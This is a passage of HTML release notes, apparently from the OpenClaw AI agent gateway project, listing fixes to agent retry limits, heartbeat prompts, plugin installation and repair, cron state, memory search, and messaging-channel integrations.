<p>Gateway: preserve stack diagnostics when <code>chat.send</code> or agent attachment parsing/staging fails, improving image-send failure triage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4228443758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63432" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63432/hovercard" href="https://github.com/openclaw/openclaw/issues/63432">#63432</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359396699" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75135" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75135/hovercard" href="https://github.com/openclaw/openclaw/pull/75135">#75135</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keen0206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keen0206">@keen0206</a>.</p>
</li>
<li>
<p>Agents/idle-timeout: add a cost-runaway breaker to the outer embedded-run retry loop that halts further attempts after 5 consecutive idle timeouts without completed model progress, so a wedged provider can no longer fan paid model calls out across the same run; completed text or tool-call progress resets the breaker, but partial tool-argument token dribbles do not. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370289299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76293" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76293/hovercard" href="https://github.com/openclaw/openclaw/issues/76293">#76293</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ThePuma312/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ThePuma312">@ThePuma312</a>.</p>
</li>
<li>
<p>Heartbeats/Codex: align structured heartbeat prompts with actual <code>heartbeat_respond</code> tool availability, stop sending legacy <code>HEARTBEAT_OK</code> when the tool exists, and keep tool-disabled commitment check-ins on the legacy ack path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agent runtimes: fail explicit plugin runtime selections honestly when the requested harness is unavailable instead of silently falling back to the embedded PI runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Maintainer workflow: push prepared PR heads through GitHub's verified commit API by default and require an explicit override before git-protocol pushes can publish unsigned commits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Feishu: resolve setup/status probes through the selected/default account so multi-account configs with account-scoped app credentials show as configured and probeable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337409818" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72930" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72930/hovercard" href="https://github.com/openclaw/openclaw/issues/72930">#72930</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</p>
</li>
<li>
<p>Gateway/responses: emit every client tool call from <code>/v1/responses</code> JSON and SSE responses when the agent invokes multiple client tools in a single turn, so multi-tool plans, graph orchestration calls, and similar batched flows no longer drop every call but the last. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116186321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52288" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52288/hovercard" href="https://github.com/openclaw/openclaw/issues/52288">#52288</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CharZhou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CharZhou">@CharZhou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bonelli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bonelli">@bonelli</a>.</p>
</li>
<li>
<p>Gateway/agent: enforce <code>session.sendPolicy=deny</code> on gateway agent requests only when <code>deliver: true</code>, so non-delivery smoke checks and internal agent runs are no longer rejected with <code>send blocked by session policy</code> while outbound delivery remains gated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341403030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73381" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73381/hovercard" href="https://github.com/openclaw/openclaw/issues/73381">#73381</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wenxu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wenxu007">@wenxu007</a>.</p>
</li>
<li>
<p>Slack/reactions: treat missing no_reaction remove responses as idempotent success and route own-reaction cleanup through the remove helper, so concurrent cleanup no longer surfaces Slack race errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105088415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50733/hovercard" href="https://github.com/openclaw/openclaw/issues/50733">#50733</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370345462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76304" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76304/hovercard" href="https://github.com/openclaw/openclaw/pull/76304">#76304</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hollychou924/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hollychou924">@Hollychou924</a>.</p>
</li>
<li>
<p>Feishu: include media <code>file_key</code> and <code>image_key</code> values in inbound dedupe so reused message IDs still process distinct media attachments while true retries stay suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357858578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75057" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75057/hovercard" href="https://github.com/openclaw/openclaw/issues/75057">#75057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
<p>Control UI/Gateway: avoid full session-list reloads for locally applied message-phase session updates, carry known session keys through transcript-file update events, and defer media provider listing when explicit generation model config is present. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369867512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76236" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76236/hovercard" href="https://github.com/openclaw/openclaw/issues/76236">#76236</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369693147" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76203" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76203/hovercard" href="https://github.com/openclaw/openclaw/issues/76203">#76203</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369600766" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76188" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76188/hovercard" href="https://github.com/openclaw/openclaw/issues/76188">#76188</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369131982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76107" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76107/hovercard" href="https://github.com/openclaw/openclaw/issues/76107">#76107</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369510539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76166" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76166/hovercard" href="https://github.com/openclaw/openclaw/issues/76166">#76166</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Install/update: prune the obsolete <code>plugin-runtime-deps</code> state directory during packaged postinstall so upgrades from pre-2026.5.2 releases reclaim old bundled-plugin dependency caches without touching external plugin installs.</p>
</li>
<li>
<p>Auto-reply/queue: treat reset-triggered <code>/new</code> and <code>/reset</code> turns as interrupt runs across active-run queue handling, so steer/followup modes cannot delay a fresh session behind existing work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348103885" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74093" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74093/hovercard" href="https://github.com/openclaw/openclaw/issues/74093">#74093</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348397494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74144" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74144/hovercard" href="https://github.com/openclaw/openclaw/pull/74144">#74144</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ruji9527/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ruji9527">@ruji9527</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yelog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yelog">@yelog</a>.</p>
</li>
<li>
<p>Cron: persist repaired startup runtime state back to <code>jobs-state.json</code> so a valid future <code>nextRunAtMs</code> with missing <code>updatedAtMs</code> no longer triggers repeated external health-check repairs after Gateway restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370927215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76461" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76461/hovercard" href="https://github.com/openclaw/openclaw/issues/76461">#76461</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Cron: preserve manual <code>cron.run</code> IDs in <code>cron.runs</code> history so manual run acknowledgements can be correlated with finished run records. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370150294" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76276/hovercard" href="https://github.com/openclaw/openclaw/issues/76276">#76276</a>.</p>
</li>
<li>
<p>CLI/devices: request <code>operator.admin</code> for <code>openclaw devices approve &lt;requestId&gt;</code> only when the exact pending device request would mint or inherit admin-scoped operator access, while keeping lower-scope approvals on the pairing scope.</p>
</li>
<li>
<p>Memory/embedding: broaden the embedding reindex retry classifier to include transient socket-layer errors (<code>fetch failed</code>, <code>ECONNRESET</code>, <code>socket hang up</code>, <code>UND_ERR_*</code>, <code>closed</code>) so memory reindex survives provider network hiccups instead of aborting mid-run. Related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162666762" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56815" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56815/hovercard" href="https://github.com/openclaw/openclaw/issues/56815">#56815</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065430828" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44166" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44166/hovercard" href="https://github.com/openclaw/openclaw/issues/44166">#44166</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370365109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76311" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76311/hovercard" href="https://github.com/openclaw/openclaw/pull/76311">#76311</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/buyitsydney/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/buyitsydney">@buyitsydney</a>.</p>
</li>
<li>
<p>Memory/sessions: keep rotated and deleted transcripts (<code>.jsonl.reset.&lt;iso&gt;</code> / <code>.jsonl.deleted.&lt;iso&gt;</code>) searchable by indexing archive content, mapping archive hits back to live transcript stems, emitting transcript update events on archive rotation, and bypassing incremental delta thresholds for one-shot archive mutations while keeping backups and compaction checkpoints opaque. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4157084622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56131/hovercard" href="https://github.com/openclaw/openclaw/issues/56131">#56131</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/buyitsydney/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/buyitsydney">@buyitsydney</a>.</p>
</li>
<li>
<p>Memory/search: keep sqlite-vec optional in packaged installs and point missing-extension recovery at the valid <code>agents.defaults.memorySearch.store.vector.extensionPath</code> setting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/willemsej/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/willemsej">@willemsej</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway: keep directly requested plugin tools invokable under restrictive tool profiles while preserving explicit deny lists and the HTTP safety deny list, preventing catalog/invoke mismatches that surface as "Tool not available". Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Gateway/update: allow beta binaries to refresh gateway services when the config was last written by the matching stable release version, avoiding false newer-config downgrade blocks during beta channel updates.</p>
</li>
<li>
<p>Channels: keep Matrix and Mattermost bundled in the core package instead of advertising external npm installs before those channels are cut over. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Bonjour: disable LAN mDNS advertising after a repeated stuck-announcing recovery instead of repeatedly restarting ciao and saturating the Gateway event loop.</p>
</li>
<li>
<p>Channels/setup: label installable channel picker hints as remote npm installs and hide remote install hints for bundled plugins that already ship with OpenClaw.</p>
</li>
<li>
<p>CLI/update: refuse package updates launched from the active gateway process tree before stopping the managed Gateway service, avoiding self-terminated in-lane updates that leave old Gateway code running. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364875425" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75691" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75691/hovercard" href="https://github.com/openclaw/openclaw/issues/75691">#75691</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366736571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75819/hovercard" href="https://github.com/openclaw/openclaw/pull/75819">#75819</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>CLI/plugins: stop treating the non-plugin <code>auth</code> command root as a bundled plugin id, so restrictive <code>plugins.allow</code> configs no longer tell users to add stale <code>auth</code> plugin entries.</p>
</li>
<li>
<p>Doctor/plugins: update configured plugin installs whose stale manifests still declare channels without <code>channelConfigs</code>, so beta upgrades repair old Discord-style package payloads during <code>doctor --fix</code>.</p>
</li>
<li>
<p>Doctor/plugins: repair configured external plugin installs whose persisted install record points at a missing package directory, so upgrades reconcile phantom npm metadata before plugin runtime validation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Active Memory: keep non-empty <code>memory_search</code> results from being fast-failed as empty when debug telemetry reports zero hits.</p>
</li>
<li>
<p>Active Memory: preserve the target agent context when building embedded recall plugin tools so <code>memory_search</code> and <code>memory_get</code> stay available for explicit recall sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370503514" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76343/hovercard" href="https://github.com/openclaw/openclaw/issues/76343">#76343</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Countermarch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Countermarch">@Countermarch</a>.</p>
</li>
<li>
<p>Plugins/externalization: repair missing configured plugin installs from npm by default, reserve ClawHub downloads for explicit <code>clawhubSpec</code> metadata, and cover agent-runtime/env-selected plugin repair. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: allow official catalog-matched npm channel plugins such as Feishu to pass the trusted install scanner path while keeping spoofed package names blocked. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Tools/llm-task: keep JSON-only embedded model runs from tripping inherited tool allowlists when tools are intentionally disabled, while preserving runtime <code>toolsAllow</code> failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347559374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74019" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74019/hovercard" href="https://github.com/openclaw/openclaw/issues/74019">#74019</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Tools/profiles: make <code>tools.profile: "full"</code> grant all tools including optional plugin tools such as browser, so the full profile no longer silently drops plugin-provided tools that require an explicit allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371092864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76507" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76507/hovercard" href="https://github.com/openclaw/openclaw/issues/76507">#76507</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Feishu: keep timeout env parsing separate from the HTTP client wrapper so package security scans no longer report a false env-harvesting hit during install. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Upgrade/config: validate configured web-search providers and statically suppressed model/provider pairs against the active plugin set at config load, so stale plugin state fails loud before runtime fallback.</p>
</li>
<li>
<p>Status/update: resolve beta update-channel checks from the installed version when config still says <code>stable</code>, and let <code>status --deep</code> reuse live gateway channel credential state instead of warning on command-path-only token misses.</p>
</li>
<li>
<p>Doctor/plugins: preserve unmanaged third-party plugin <code>node_modules</code> during <code>doctor --fix</code>, while still pruning OpenClaw-managed runtime dependency caches.</p>
</li>
<li>
<p>Gateway/restart: add <code>openclaw gateway restart --force</code> and <code>--wait &lt;duration&gt;</code>, log active task run IDs before restart deferral timers, and report timeout restarts as explicit forced restarts.</p>
</li>
<li>
<p>Discord: persist slash-command deploy hashes across process restarts so unchanged command sets skip redeploy and avoid restart-loop 429s.</p>
</li>
<li>
<p>Providers/LM Studio: normalize binary <code>off</code>/<code>on</code> reasoning metadata from Gemma 4 and other local models to LM Studio's accepted OpenAI-compatible <code>reasoning_effort</code> values.</p>
</li>
<li>
<p>Plugins/externalization: keep official external install docs, update examples, and live Codex npm checks on default npm tags instead of <code>@beta</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/externalization: keep ACPX, Google Chat, and LINE publishable plugin dist trees out of the core npm package file list.</p>
</li>
<li>
<p>Plugins/ClawHub: fall back to version metadata when the artifact resolver route is missing and keep the Docker ClawHub fixture aligned with npm-pack artifact resolution, avoiding false version-not-found failures during plugin install validation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Providers/openai-codex: honor <code>providerConfig.baseUrl</code> in the dynamic-model synthesis fallback so codex providers configured with a custom upstream (for example a forwarding proxy) no longer silently bypass the configured URL when the registry has no template row to clone for the requested model id. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370800895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76428" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76428/hovercard" href="https://github.com/openclaw/openclaw/pull/76428">#76428</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arniesaha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arniesaha">@arniesaha</a>.</p>
</li>
<li>
<p>Status/channels: show configured channels in <code>openclaw status</code> and config-only <code>openclaw channels status</code> output even when the Gateway is unreachable, avoiding empty Channels tables on WSL and other no-Gateway paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: explain unavailable explicit ClawHub ClawPack artifact downloads with a temporary npm install hint while ClawHub artifact routing rolls out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Media: accept home-relative <code>MEDIA:~/...</code> attachment paths while preserving existing file-read policy, traversal checks, and media type validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346056562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73796/hovercard" href="https://github.com/openclaw/openclaw/issues/73796">#73796</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkury">@fabkury</a>.</p>
</li>
<li>
<p>Onboarding/search: install official external web-search plugins such as Brave before saving provider config, and make doctor repair reconcile selected external search providers whose npm payload is missing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/externalization: add official npm-first catalogs for externalized channel, provider, and generic plugins, keep unpublished ACPX/Google Chat/LINE bundled, and make missing-plugin repair honor npm-first metadata while ClawHub pack files roll out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/update: detect tracked plugin install records whose package directories disappeared during <code>openclaw update</code>, reinstall them before normal plugin updates, and fail the update if any install record still points at missing disk payloads.</p>
</li>
<li>
<p>Plugins/registry: hash manifest and package metadata when validating persisted plugin registries so fast same-size rewrites cannot leave stale plugin metadata trusted.</p>
</li>
<li>
<p>Plugins/registry: canonicalize install-record provenance paths before trust diagnostics, so npm plugins installed under symlinked temp/state roots no longer warn as untracked local code.</p>
</li>
<li>
<p>Plugins/install: let official external Discord reinstall requests pass the invalid-config guard and run stale-channel repair, so upgrades can recover missing external plugin state directly.</p>
</li>
<li>
<p>CLI/infer: reject local <code>codex/*</code> one-shot model probes before simple-completion dispatch and point operators at the Codex app-server runtime path instead of ending with an empty-output error.</p>
</li>
<li>
<p>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing <code>main</code> sessions from staying stuck as running after completed or timed-out turns.</p>
</li>
<li>
<p>Gateway/CLI: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting.</p>
</li>
<li>
<p>Heartbeat/scheduler: make heartbeat phase scheduling active-hours-aware so the scheduler seeks forward to the first in-window phase slot instead of arming timers for quiet-hours slots and relying solely on the runtime guard. Non-UTC <code>activeHours.timezone</code> values (e.g. <code>Asia/Shanghai</code>) now correctly influence when the next heartbeat timer fires, avoiding wasted quiet-hours ticks and long dormant gaps after gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363246759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75487/hovercard" href="https://github.com/openclaw/openclaw/issues/75487">#75487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Providers/Arcee AI: mark Trinity Large Thinking as tool-incompatible so main-session runs use the same text-only request shape that made subagent runs recover, avoiding the remaining main-session response-shape mismatch after the <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221668426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62848/hovercard" href="https://github.com/openclaw/openclaw/issues/62848">#62848</a> transport failover fix. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221687645" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62851/hovercard" href="https://github.com/openclaw/openclaw/issues/62851">#62851</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221667245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62847" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62847/hovercard" href="https://github.com/openclaw/openclaw/issues/62847">#62847</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221668426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62848/hovercard" href="https://github.com/openclaw/openclaw/issues/62848">#62848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adam-Researchh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adam-Researchh">@Adam-Researchh</a>.</p>
</li>
<li>
